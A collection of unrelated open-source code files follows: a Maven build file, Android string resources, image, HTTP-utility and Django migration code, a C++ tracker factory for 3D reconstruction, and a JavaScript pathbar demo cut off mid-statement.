<!--<artifactId>spring-boot-starter</artifactId>--> <!--</dependency>--> <!--<dependency>--> <!--<groupId>org.springframework.boot</groupId>--> <!--<artifactId>spring-boot-starter-test</artifactId>--> <!--<scope>test</scope>--> <!--</dependency>--> <dependency> <groupId>com.company</groupId> <artifactId>x-manerger-sys-common-utils</artifactId> <version>0.0.1-SNAPSHOT</version> </dependency> <dependency> <groupId>com.lmax</groupId> <artifactId>disruptor</artifactId> <version>${disruptor.version}</version> </dependency> <dependency> <groupId>com.ibeetl</groupId> <artifactId>beetl-framework-starter</artifactId> <version>${beetl.version}</version> </dependency> <dependency> <groupId>com.google.code.gson</groupId> <artifactId>gson</artifactId> <version>2.8.5</version> </dependency> <!--阿里--> <dependency> <groupId>com.aliyun</groupId> <artifactId>aliyun-java-sdk-core</artifactId> <version>4.0.8</version> </dependency> <dependency> <groupId>com.aliyun</groupId> <artifactId>aliyun-java-sdk-dysmsapi</artifactId> <version>1.1.0</version> </dependency> <!--huyi--> <dependency> <groupId>dom4j</groupId> <artifactId>dom4j</artifactId> <version>${dom4j.version}</version> </dependency> <!--腾讯短信--> <dependency> <groupId>com.github.qcloudsms</groupId> <artifactId>qcloudsms</artifactId> <version>1.0.5</version> </dependency> </dependencies> <build> <finalName>${project.artifactId}</finalName> <plugins> <!-- 编码和编译和JDK版本 --> <plugin> <groupId>org.apache.maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <version>2.3.2</version> <configuration> <source>${maven.compiler.source}</source> <target>${maven.compiler.source}</target> <encoding>${project.build.sourceEncoding}</encoding> </configuration> </plugin> </plugins> </build> </project>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!-- Copyright (C) 2018 The Android Open Source Project Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <resources xmlns:android="http://schemas.android.com/apk/res/android" xmlns:xliff="urn:oasis:names:tc:xliff:document:1.2"> <string name="enabled_by_admin" msgid="6630472777476410137">"ನಿರ್ವಾಹಕರು ಸಕ್ರಿಯಗೊಳಿಸಿದ್ದಾರೆ"</string> <string name="disabled_by_admin" msgid="4023569940620832713">"ನಿರ್ವಾಹಕರು ನಿಷ್ಕ್ರಿಯಗೊಳಿಸಿದ್ದಾರೆ"</string> </resources>
{ "pile_set_name": "Github" }
/* * This file is part of the SDWebImage package. * (c) Olivier Poitrey <[email protected]> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ #import "NSImage+Compatibility.h" #if SD_MAC #import "SDImageCoderHelper.h" @implementation NSImage (Compatibility) - (nullable CGImageRef)CGImage { NSRect imageRect = NSMakeRect(0, 0, self.size.width, self.size.height); CGImageRef cgImage = [self CGImageForProposedRect:&imageRect context:nil hints:nil]; return cgImage; } - (CGFloat)scale { CGFloat scale = 1; NSRect imageRect = NSMakeRect(0, 0, self.size.width, self.size.height); NSImageRep *imageRep = [self bestRepresentationForRect:imageRect context:nil hints:nil]; CGFloat width = imageRep.size.width; CGFloat height = imageRep.size.height; NSUInteger pixelWidth = imageRep.pixelsWide; NSUInteger pixelHeight = imageRep.pixelsHigh; if (width > 0 && height > 0) { CGFloat widthScale = pixelWidth / width; CGFloat heightScale = pixelHeight / height; if (widthScale == heightScale && widthScale >= 1) { // Protect because there may be `NSImageRepMatchesDevice` (0) scale = widthScale; } } return scale; } - (instancetype)initWithCGImage:(nonnull CGImageRef)cgImage scale:(CGFloat)scale orientation:(CGImagePropertyOrientation)orientation { NSBitmapImageRep *imageRep; if (orientation != kCGImagePropertyOrientationUp) { // AppKit design is different from UIKit. Where CGImage based image rep does not respect to any orientation. Only data based image rep which contains the EXIF metadata can automatically detect orientation. // This should be nonnull, until the memory is exhausted cause `CGBitmapContextCreate` failed. CGImageRef rotatedCGImage = [SDImageCoderHelper CGImageCreateDecoded:cgImage orientation:orientation]; imageRep = [[NSBitmapImageRep alloc] initWithCGImage:rotatedCGImage]; CGImageRelease(rotatedCGImage); } else { imageRep = [[NSBitmapImageRep alloc] initWithCGImage:cgImage]; } if (scale < 1) { scale = 1; } CGFloat pixelWidth = imageRep.pixelsWide; CGFloat pixelHeight = imageRep.pixelsHigh; NSSize size = NSMakeSize(pixelWidth / scale, pixelHeight / scale); self = [self initWithSize:size]; if (self) { imageRep.size = size; [self addRepresentation:imageRep]; } return self; } - (instancetype)initWithData:(nonnull NSData *)data scale:(CGFloat)scale { NSBitmapImageRep *imageRep = [[NSBitmapImageRep alloc] initWithData:data]; if (!imageRep) { return nil; } if (scale < 1) { scale = 1; } CGFloat pixelWidth = imageRep.pixelsWide; CGFloat pixelHeight = imageRep.pixelsHigh; NSSize size = NSMakeSize(pixelWidth / scale, pixelHeight / scale); self = [self initWithSize:size]; if (self) { imageRep.size = size; [self addRepresentation:imageRep]; } return self; } @end #endif
{ "pile_set_name": "Github" }
import os import shutil import logging import tempfile import subprocess import xml.etree.ElementTree as ET from django.db import migrations from django.core.files.uploadedfile import UploadedFile from django_irods.storage import IrodsStorage from hs_core import hydroshare from hs_core.hydroshare.utils import resource_modified from hs_geo_raster_resource.models import RasterResource from hs_file_types import raster_meta_extract def migrate_tif_file(apps, schema_editor): log = logging.getLogger() istorage = IrodsStorage() copy_res_fail = [] vrt_update_fail = [] vrt_update_success = [] meta_update_fail = [] meta_update_success = [] # start migration for each raster resource that has raster files for res in RasterResource.objects.all(): if res.files.all(): # copy all the resource files to temp dir try: temp_dir = tempfile.mkdtemp() for res_file in res.files.all(): shutil.copy(res_file.resource_file.file.name, os.path.join(temp_dir, os.path.basename(res_file.resource_file.name))) vrt_file_path = [os.path.join(temp_dir, f) for f in os.listdir(temp_dir) if '.vrt' == f[-4:]].pop() except Exception as e: log.exception(str(e)) copy_res_fail.append('{}:{}'.format(res.short_id, res.metadata.title.value)) continue # update vrt file if the raster resource that has a single tif file try: if len(os.listdir(temp_dir)) == 2: # create new vrt file tif_file_path = [os.path.join(temp_dir, f) for f in os.listdir(temp_dir) if '.tif' == f[-4:]].pop() with open(os.devnull, 'w') as fp: subprocess.Popen(['gdal_translate', '-of', 'VRT', tif_file_path, vrt_file_path], stdout=fp, stderr=fp).wait() # remember to add .wait() # modify the vrt file contents tree = ET.parse(vrt_file_path) root = tree.getroot() for element in root.iter('SourceFilename'): element.attrib['relativeToVRT'] = '1' tree.write(vrt_file_path) # delete vrt res file for f in res.files.all(): if 'vrt' == f.resource_file.name[-3:]: f.resource_file.delete() f.delete() # add new vrt file to resource new_file = UploadedFile(file=open(vrt_file_path, 'r'), name=os.path.basename(vrt_file_path)) hydroshare.add_resource_files(res.short_id, new_file) # update the bag bag_name = 'bags/{res_id}.zip'.format(res_id=res.short_id) if istorage.exists(bag_name): # delete the resource bag as the old bag is not valid istorage.delete(bag_name) resource_modified(res, res.creator) vrt_update_success.append('{}:{}'.format(res.short_id,res.metadata.title.value)) except Exception as e: log.exception(str(e)) vrt_update_fail.append('{}:{}'.format(res.short_id,res.metadata.title.value)) # update the metadata for the band information of all the raster resources try: meta_updated = False # extract meta ori_dir = os.getcwd() os.chdir(temp_dir) res_md_dict = raster_meta_extract.get_raster_meta_dict(vrt_file_path) os.chdir(ori_dir) shutil.rmtree(temp_dir) # update band information metadata in django if res_md_dict['band_info']: for i, band_meta in list(res_md_dict['band_info'].items()): band_obj = res.metadata.bandInformation.filter(name='Band_{}'.format(i)).first() if band_obj: res.metadata.update_element('bandInformation', band_obj.id, maximumValue=band_meta['maximumValue'], minimumValue=band_meta['minimumValue'], noDataValue=band_meta['noDataValue'], ) meta_updated = True # update the bag if meta is updated if meta_updated: bag_name = 'bags/{res_id}.zip'.format(res_id=res.short_id) if istorage.exists(bag_name): # delete the resource bag as the old bag is not valid istorage.delete(bag_name) resource_modified(res, res.creator) meta_update_success.append('{}:{}'.format(res.short_id, res.metadata.title.value)) except Exception as e: log.exception(str(e)) meta_update_fail.append('{}:{}'.format(res.short_id, res.metadata.title.value)) # Print migration results print(('Copy resource to temp folder failure: Number: {} List: {}'.format(len(copy_res_fail), copy_res_fail))) print(('VRT file update success: Number: {} List{}'.format(len(vrt_update_success), vrt_update_success))) print(('VRT file update fail: Number: {} List{}'.format(len(vrt_update_fail), vrt_update_fail))) print(('Meta update success: Number: {} List {}'.format(len(meta_update_success), meta_update_success))) print(('Meta update fail: Number: {} List {}'.format(len(meta_update_fail), meta_update_fail))) def undo_migrate_tif_file(apps, schema_editor): log = logging.getLogger() meta_reverse_fail = [] # loop through each raster resource and change the no data value, min, max values of each band for res in RasterResource.objects.all(): for band_obj in res.metadata.bandInformation: try: res.metadata.update_element('bandInformation', band_obj.id, maximumValue=None, minimumValue=None, noDataValue=None, ) except Exception as e: log.exception(str(e)) meta_reverse_fail.append('{}:{}, band:{}'.format(res.short_id, res.metadata.title.value, band_obj.id)) print(('Meta recover to initial state fail: List {}'.format(meta_reverse_fail))) class Migration(migrations.Migration): dependencies = [ ('hs_geo_raster_resource', '0005_auto_20160509_2116'), ] operations = [ migrations.RunPython(code=migrate_tif_file, reverse_code=undo_migrate_tif_file), ]
{ "pile_set_name": "Github" }
from __future__ import absolute_import from ..packages.six.moves import http_client as httplib from ..exceptions import HeaderParsingError def is_fp_closed(obj): """ Checks whether a given file-like object is closed. :param obj: The file-like object to check. """ try: # Check via the official file-like-object way. return obj.closed except AttributeError: pass try: # Check if the object is a container for another file-like object that # gets released on exhaustion (e.g. HTTPResponse). return obj.fp is None except AttributeError: pass raise ValueError("Unable to determine whether fp is closed.") def assert_header_parsing(headers): """ Asserts whether all headers have been successfully parsed. Extracts encountered errors from the result of parsing headers. Only works on Python 3. :param headers: Headers to verify. :type headers: `httplib.HTTPMessage`. :raises urllib3.exceptions.HeaderParsingError: If parsing errors are found. """ # This will fail silently if we pass in the wrong kind of parameter. # To make debugging easier add an explicit check. if not isinstance(headers, httplib.HTTPMessage): raise TypeError('expected httplib.Message, got {0}.'.format( type(headers))) defects = getattr(headers, 'defects', None) get_payload = getattr(headers, 'get_payload', None) unparsed_data = None if get_payload: # Platform-specific: Python 3. unparsed_data = get_payload() if defects or unparsed_data: raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data) def is_response_to_head(response): """ Checks whether the request of a response has been a HEAD-request. Handles the quirks of AppEngine. :param conn: :type conn: :class:`httplib.HTTPResponse` """ # FIXME: Can we do this somehow without accessing private httplib _method? method = response._method if isinstance(method, int): # Platform-specific: Appengine return method == 3 return method.upper() == 'HEAD'
{ "pile_set_name": "Github" }
// Copyright 2014-2017 Oxford University Innovation Limited and the authors of InfiniTAM #pragma once #include <stdexcept> #include <vector> #include "CPU/ITMColorTracker_CPU.h" #include "CPU/ITMDepthTracker_CPU.h" #include "CPU/ITMExtendedTracker_CPU.h" #include "Interface/ITMCompositeTracker.h" #include "Interface/ITMIMUTracker.h" #include "Interface/ITMFileBasedTracker.h" #include "Interface/ITMForceFailTracker.h" #include "Interface/ITMTracker.h" #include "../Engines/LowLevel/Interface/ITMLowLevelEngine.h" #include "../Utils/ITMLibSettings.h" #ifndef COMPILE_WITHOUT_CUDA #include "CUDA/ITMColorTracker_CUDA.h" #include "CUDA/ITMDepthTracker_CUDA.h" #include "CUDA/ITMExtendedTracker_CUDA.h" #endif #ifdef COMPILE_WITH_METAL #include "Metal/ITMExtendedTracker_Metal.h" #endif #include "../../ORUtils/KeyValueConfig.h" namespace ITMLib { /** * \brief An instance of this class can be used to construct trackers. */ class ITMTrackerFactory { private: //#################### TYPEDEFS #################### typedef ITMTracker* MakerFunc(const Vector2i&,const Vector2i&,ITMLibSettings::DeviceType,const ORUtils::KeyValueConfig &,const ITMLowLevelEngine*,ITMIMUCalibrator*,const ITMSceneParams*); /// Tracker types typedef enum { //! Identifies a tracker based on colour image TRACKER_COLOR, //! Identifies a tracker based on depth image TRACKER_ICP, //! Identifies a tracker based on depth and color image with various extensions TRACKER_EXTENDED, //! Identifies a tracker reading poses from text files TRACKER_FILE, //! Identifies a tracker based on depth image and IMU measurement TRACKER_IMU, //! Identifies a tracker based on depth and colour images and IMU measurement TRACKER_EXTENDEDIMU, //! Identifies a tracker that forces tracking to fail TRACKER_FORCEFAIL, } TrackerType; struct Maker { const char *id; const char *description; TrackerType type; MakerFunc *make; Maker(const char *_id, const char *_desc, TrackerType _type, MakerFunc *_make) : id(_id), description(_desc), type(_type), make(_make) {} }; //#################### PRIVATE VARIABLES #################### /** A list of maker functions for the various tracker types. */ std::vector<Maker> makers; //################## SINGLETON IMPLEMENTATION ################## /** * \brief Constructs a tracker factory. */ ITMTrackerFactory(void) { makers.push_back(Maker("rgb", "Colour based tracker", TRACKER_COLOR, &MakeColourTracker)); makers.push_back(Maker("icp", "Depth based ICP tracker", TRACKER_ICP, &MakeICPTracker)); makers.push_back(Maker("extended", "Depth + colour based tracker", TRACKER_EXTENDED, &MakeExtendedTracker)); makers.push_back(Maker("file", "File based tracker", TRACKER_FILE, &MakeFileBasedTracker)); makers.push_back(Maker("imuicp", "Combined IMU and depth based ICP tracker", TRACKER_IMU, &MakeIMUTracker)); makers.push_back(Maker("extendedimu", "Combined IMU and depth + colour ICP tracker", TRACKER_EXTENDEDIMU, &MakeExtendedIMUTracker)); makers.push_back(Maker("forcefail", "Force fail tracker", TRACKER_FORCEFAIL, &MakeForceFailTracker)); } public: /** * \brief Gets the singleton instance for the current set of template parameters. */ static ITMTrackerFactory& Instance() { static ITMTrackerFactory s_instance; return s_instance; } //################## PUBLIC MEMBER FUNCTIONS ################## public: /** * \brief Makes a tracker of the type specified in the trackerConfig string. */ ITMTracker *Make(ITMLibSettings::DeviceType deviceType, const char *trackerConfig, const Vector2i & imgSize_rgb, const Vector2i & imgSize_d, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) const { ORUtils::KeyValueConfig cfg(trackerConfig); int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; ORUtils::KeyValueConfig::ChoiceList trackerOptions; for (int i = 0; (unsigned)i < makers.size(); ++i) { trackerOptions.addChoice(makers[i].id, makers[i].type); } int type = TRACKER_ICP; cfg.parseChoiceProperty("type", "type of tracker", type, trackerOptions, verbose); const Maker *maker = NULL; for (int i = 0; (unsigned)i < makers.size(); ++i) { if (makers[i].type == type) { maker = &(makers[i]); break; } } if (maker == NULL) DIEWITHEXCEPTION("Unknown tracker type"); ITMTracker *ret = (*(maker->make))(imgSize_rgb, imgSize_d, deviceType, cfg, lowLevelEngine, imuCalibrator, sceneParams); if (ret->requiresColourRendering()) { printf("Assuming a voxel type with colour information!"); } return ret; } /** * \brief Makes a tracker of the type specified in the settings. */ ITMTracker *Make(const Vector2i & imgSize_rgb, const Vector2i & imgSize_d, const ITMLibSettings *settings, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) const { return Make(settings->deviceType, settings->trackerConfig, imgSize_rgb, imgSize_d, lowLevelEngine, imuCalibrator, sceneParams); } //#################### PUBLIC STATIC MEMBER FUNCTIONS #################### static std::vector<TrackerIterationType> parseLevelConfig(const char *str) { bool parseError = false; std::vector<TrackerIterationType> ret; for (int i = static_cast<int>(strlen(str))-1; i >= 0; --i) { switch (str[i]) { case 'r': ret.push_back(TRACKER_ITERATION_ROTATION); break; case 't': ret.push_back(TRACKER_ITERATION_TRANSLATION); break; case 'b': ret.push_back(TRACKER_ITERATION_BOTH); break; case 'n': ret.push_back(TRACKER_ITERATION_NONE); break; default: parseError = true; break; } } if (parseError) { fprintf(stderr, "error parsing level configuration '%s'\n", str); for (int i = 0; (unsigned)i < ret.size(); ++i) fprintf(stderr, "level %i: %i\n", (int)ret.size()-i, (int)(ret[ret.size()-i])); } return ret; } /** * \brief Makes a colour tracker. */ static ITMTracker *MakeColourTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; const char *levelSetup = "rrrbb"; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); ITMColorTracker *ret = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: ret = new ITMColorTracker_CPU(imgSize_rgb, &(levels[0]), static_cast<int>(levels.size()), lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA ret = new ITMColorTracker_CUDA(imgSize_rgb, &(levels[0]), static_cast<int>(levels.size()), lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL ret = new ITMColorTracker_CPU(imgSize_rgb, &(levels[0]), static_cast<int>(levels.size()), lowLevelEngine); #endif break; } if (ret==NULL) DIEWITHEXCEPTION("Failed to make colour tracker"); return ret; } /** * \brief Makes an ICP tracker. */ static ITMTracker *MakeICPTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { const char *levelSetup = "rrrbb"; float smallStepSizeCriterion = 1e-3f; float outlierDistanceFine = 0.002f; float outlierDistanceCoarse = 0.01f; float failureDetectorThd = 3.0f; int numIterationsCoarse = 10; int numIterationsFine = 2; int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); cfg.parseFltProperty("minstep", "step size threshold for convergence", smallStepSizeCriterion, verbose); cfg.parseFltProperty("outlierC", "outlier threshold at coarsest level", outlierDistanceCoarse, verbose); cfg.parseFltProperty("outlierF", "outlier threshold at finest level", outlierDistanceFine, verbose); cfg.parseIntProperty("numiterC", "maximum number of iterations at coarsest level", numIterationsCoarse, verbose); cfg.parseIntProperty("numiterF", "maximum number of iterations at finest level", numIterationsFine, verbose); cfg.parseFltProperty("failureDec", "threshold for the failure detection", failureDetectorThd, verbose); ITMDepthTracker *ret = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: ret = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA ret = new ITMDepthTracker_CUDA(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL ret = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; } if (ret == NULL) DIEWITHEXCEPTION("Failed to make ICP tracker"); ret->SetupLevels(numIterationsCoarse, numIterationsFine, outlierDistanceCoarse, outlierDistanceFine); return ret; } /** * \brief Makes an Extended tracker. */ static ITMTracker *MakeExtendedTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { const char *levelSetup = "rrbb"; bool useDepth = true; bool useColour = false; float colourWeight = 0.3f; float smallStepSizeCriterion = 1e-4f; float outlierSpaceDistanceFine = 0.004f; float outlierSpaceDistanceCoarse = 0.1f; float outlierColourDistanceFine = 0.175f; float outlierColourDistanceCoarse = 0.005f; float failureDetectorThd = 3.0f; float minColourGradient = 0.01f; float tukeyCutOff = 8.0f; int framesToSkip = 20; int framesToWeight = 50; int numIterationsCoarse = 20; int numIterationsFine = 20; int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); cfg.parseBoolProperty("useDepth", "use ICP based tracking", useDepth, verbose); cfg.parseBoolProperty("useColour", "use colour based tracking", useColour, verbose); cfg.parseFltProperty("colourWeight", "weight used to scale colour errors and jacobians when both useColour and useWeights are set", colourWeight, verbose); cfg.parseFltProperty("minstep", "step size threshold for convergence", smallStepSizeCriterion, verbose); cfg.parseFltProperty("outlierSpaceC", "space outlier threshold at coarsest level", outlierSpaceDistanceCoarse, verbose); cfg.parseFltProperty("outlierSpaceF", "space outlier threshold at finest level", outlierSpaceDistanceFine, verbose); cfg.parseFltProperty("outlierColourC", "colour outlier threshold at coarsest level", outlierColourDistanceCoarse, verbose); cfg.parseFltProperty("outlierColourF", "colour outlier threshold at finest level", outlierColourDistanceFine, verbose); cfg.parseFltProperty("minColourGradient", "minimum colour gradient for a pixel to be used in the tracking", minColourGradient, verbose); cfg.parseIntProperty("numiterC", "maximum number of iterations at coarsest level", numIterationsCoarse, verbose); cfg.parseIntProperty("numiterF", "maximum number of iterations at finest level", numIterationsFine, verbose); cfg.parseFltProperty("tukeyCutOff", "cutoff for the tukey m-estimator", tukeyCutOff, verbose); cfg.parseIntProperty("framesToSkip", "number of frames to skip before depth pixel is used for tracking", framesToSkip, verbose); cfg.parseIntProperty("framesToWeight", "number of frames to weight each depth pixel for before using it fully", framesToWeight, verbose); cfg.parseFltProperty("failureDec", "threshold for the failure detection", failureDetectorThd, verbose); ITMExtendedTracker *ret = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: ret = new ITMExtendedTracker_CPU(imgSize_d, imgSize_rgb, useDepth, useColour, colourWeight, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, sceneParams->viewFrustum_min, sceneParams->viewFrustum_max, minColourGradient, tukeyCutOff, framesToSkip, framesToWeight, lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA ret = new ITMExtendedTracker_CUDA(imgSize_d, imgSize_rgb, useDepth, useColour, colourWeight, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, sceneParams->viewFrustum_min, sceneParams->viewFrustum_max, minColourGradient, tukeyCutOff, framesToSkip, framesToWeight, lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL ret = new ITMExtendedTracker_Metal(imgSize_d, imgSize_rgb, useDepth, useColour, colourWeight, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, scene->sceneParams->viewFrustum_min, scene->sceneParams->viewFrustum_max, tukeyCutOff, framesToSkip, framesToWeight, lowLevelEngine); #endif break; } if (ret == NULL) DIEWITHEXCEPTION("Failed to make extended tracker"); ret->SetupLevels(numIterationsCoarse, numIterationsFine, outlierSpaceDistanceCoarse, outlierSpaceDistanceFine, outlierColourDistanceCoarse, outlierColourDistanceFine); return ret; } /** * \brief Makes an IMU tracker. */ static ITMTracker* MakeIMUTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { const char *levelSetup = "tb"; float smallStepSizeCriterion = 1e-3f; float outlierDistanceFine = 0.005f; float outlierDistanceCoarse = 0.01f; float failureDetectorThd = 3.0f; int numIterationsCoarse = 4; int numIterationsFine = 2; int verbose = 0; if (cfg.getProperty("help") != NULL) if (verbose < 10) verbose = 10; cfg.parseStrProperty("levels", "resolution hierarchy levels", levelSetup, verbose); std::vector<TrackerIterationType> levels = parseLevelConfig(levelSetup); cfg.parseFltProperty("minstep", "step size threshold for convergence", smallStepSizeCriterion, verbose); cfg.parseFltProperty("outlierC", "outlier threshold at coarsest level", outlierDistanceCoarse, verbose); cfg.parseFltProperty("outlierF", "outlier threshold at finest level", outlierDistanceFine, verbose); cfg.parseIntProperty("numiterC", "maximum number of iterations at coarsest level", numIterationsCoarse, verbose); cfg.parseIntProperty("numiterF", "maximum number of iterations at finest level", numIterationsFine, verbose); cfg.parseFltProperty("failureDec", "threshold for the failure detection", failureDetectorThd, verbose); ITMDepthTracker *dTracker = NULL; switch (deviceType) { case ITMLibSettings::DEVICE_CPU: dTracker = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); break; case ITMLibSettings::DEVICE_CUDA: #ifndef COMPILE_WITHOUT_CUDA dTracker = new ITMDepthTracker_CUDA(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; case ITMLibSettings::DEVICE_METAL: #ifdef COMPILE_WITH_METAL dTracker = new ITMDepthTracker_CPU(imgSize_d, &(levels[0]), static_cast<int>(levels.size()), smallStepSizeCriterion, failureDetectorThd, lowLevelEngine); #endif break; default: break; } if (dTracker == NULL) DIEWITHEXCEPTION("Failed to make IMU tracker"); dTracker->SetupLevels(numIterationsCoarse, numIterationsFine, outlierDistanceCoarse, outlierDistanceFine); ITMCompositeTracker *compositeTracker = new ITMCompositeTracker; compositeTracker->AddTracker(new ITMIMUTracker(imuCalibrator)); compositeTracker->AddTracker(dTracker); return compositeTracker; } /** * \brief Makes an Extended IMU tracker. */ static ITMTracker* MakeExtendedIMUTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { ITMTracker *dTracker = MakeExtendedTracker(imgSize_rgb, imgSize_d, deviceType, cfg, lowLevelEngine, imuCalibrator, sceneParams); if (dTracker == NULL) DIEWITHEXCEPTION("Failed to make extended tracker"); // Should never happen though ITMCompositeTracker *compositeTracker = new ITMCompositeTracker; compositeTracker->AddTracker(new ITMIMUTracker(imuCalibrator)); compositeTracker->AddTracker(dTracker); return compositeTracker; } /** * \brief Makes a file based tracker. */ static ITMTracker *MakeFileBasedTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { int verbose = 0; if (cfg.getProperty("help") && verbose < 10) verbose = 10; const char *fileMask = ""; int initialFrameNo = 0; cfg.parseStrProperty("mask", "mask for the saved pose text files", fileMask, verbose); cfg.parseIntProperty("initialFrameNo", "initial frame index to use for tracking", initialFrameNo, verbose); return new ITMFileBasedTracker(fileMask, initialFrameNo); } /** * \brief Makes a force fail tracker. */ static ITMTracker *MakeForceFailTracker(const Vector2i& imgSize_rgb, const Vector2i& imgSize_d, ITMLibSettings::DeviceType deviceType, const ORUtils::KeyValueConfig & cfg, const ITMLowLevelEngine *lowLevelEngine, ITMIMUCalibrator *imuCalibrator, const ITMSceneParams *sceneParams) { return new ITMForceFailTracker; } }; }
{ "pile_set_name": "Github" }
namespace N2.Persistence.Serialization { public class WrongVersionException : DeserializationException { public WrongVersionException(string message) : base(message) { } } }
{ "pile_set_name": "Github" }
PTEMPLATE = ['Home', 'Documents', 'Events', '2015', 'GUADEC Team Reports']; MENU = ['Open in new Window', 'Open in New Tab', '', 'Move to…', 'Copy to…', 'Add to Bookmarks', 'Rename…', '', 'Properties']; PATH = { dirs: [], addDir: function () { if (PTEMPLATE[this.dirs.length]) { this.dirs.push(PTEMPLATE[this.dirs.length]); this.active = this.dirs.length-1; } if (!PTEMPLATE[this.dirs.length]) { $("#add").attr("disabled","true"); } }, active: 0, setActive: function ($x) { if ($x.children('a').length) { this.active = $x.index; $x.addClass('active') .siblings().removeClass('active'); } }, forkFromActive: function () { }, renderOut: function ($pb) { //console.log($pb,this.dirs); var h = [], b = ''; $.each(PATH.dirs, function (i,dir) { h.push('<li'); if (i==PATH.active) { h.push(' class="active"'); } h.push('><a href="#" class="hasPopover">'+PATH.dirs[i]+'</a></li>'); if (PTEMPLATE[i+1]) { h.push(' <li><span class="divider">/</span></li> '); } }); $pb.html(h.join('')); } }; $( document ).ready(function() { var $hb = $("#headerbar"), $pb = $("#pathbar"), buttonwhitespace = 235; $('#pathbar').on("contextmenu", ".hasPopover", function (ev) { /* bind an event to elements to be created */ $('.hasPopover').webuiPopover({ trigger: 'manual', animation: 'gnomeslide', placement: 'bottom', dismissible: false, // Handled in $(body), below content: function () { var html='<ul>'; $.each(MENU, function (i,item) { html += "<li><a href='#'>"+item+"</a></li>"; }); html+="</ul>"; return html; } }); $(this).webuiPopover('toggle'); $('.webui-popover-content a').click(function () { /* clicking on any menutiem dismisses the popover */ $('.hasPopover').webuiPopover('hide'); }); ev.preventDefault(); }); $pb.css("width", $hb.width() - buttonwhitespace); //set pathbar width $("#add").click(function () { PATH.addDir(); PATH.renderOut($("ul.pathbar")); }); $("#add").click(); //first item (Home) should be visible $(window).resize(function () { $pb.css('width', $hb.width() - buttonwhitespace); //set pathbar width }); $(document).on('mousedown', function (ev) { // Check if the origin is part of an actual popover var match = 